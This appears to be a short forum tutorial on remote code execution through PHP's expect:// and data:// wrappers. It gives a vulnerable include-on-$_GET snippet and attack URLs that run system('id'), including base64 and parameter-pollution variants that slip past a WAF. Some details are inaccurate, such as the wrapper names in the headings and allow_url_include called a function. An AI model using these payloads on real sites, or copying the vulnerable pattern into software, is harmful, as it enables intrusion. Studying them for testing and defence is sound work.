Remote Code Execution Through PHP Wrappers

Since I've not seen some of these methods covered around here (except for php://filter and php://input), I decided to put up some material on 'em. Basically, they are more than self-explanatory but I still feel the need to tutorialize the process. First of all, in order to execute anything, you'd need to comply with the following conditions:

• $_GET parameter

- Which we'll be passing the payload to

• Version of PHP

- 4.3+ for expect://
- 5.2+ for data://

• allow_url_include function enabled

- In order to inject through the parameter

php://expect
The expect:// wrapper is not enabled by default as it's an extension from the PECL package (consider it installed for now). The syntax it accepts is:

expect://[command]

Consider this small snippet running on the backend:

<?php

include $_GET;
//..
?>

Now we can pretty much run everything php-valid through it. so take the following URL for instance:

http://example.com/Keeper.php?page=expect://id

php://data
The data:// wrapper bears the same concept. Syntax followed:

data://text/plain;base64,[command encoded in base64]

or we can simply:

data://text/plain,[command]

We'll take under account that we'll be using the above inclusion of the $_GET parameter so there be two possible scenarios:

http://example.com/Keeper.php?page=data://text/plain;base64,JTNDJTNGc3lzdGVtJTI4JTI3aWQlMjclMjklM0IlM0YlM0U=

http://example.com/Keeper.php?page=data://text/plain,<?system('id');?>

In case of a WAF, filtering out code that is after the wrapper as in the last examples, we can use parameter pollution to pass/split our payload into two parts, resulting in both parameters being concatenated and separated by a comma likewise:

http://example.com/Keeper.php?page=data://text/plain&page=<?system('id');?>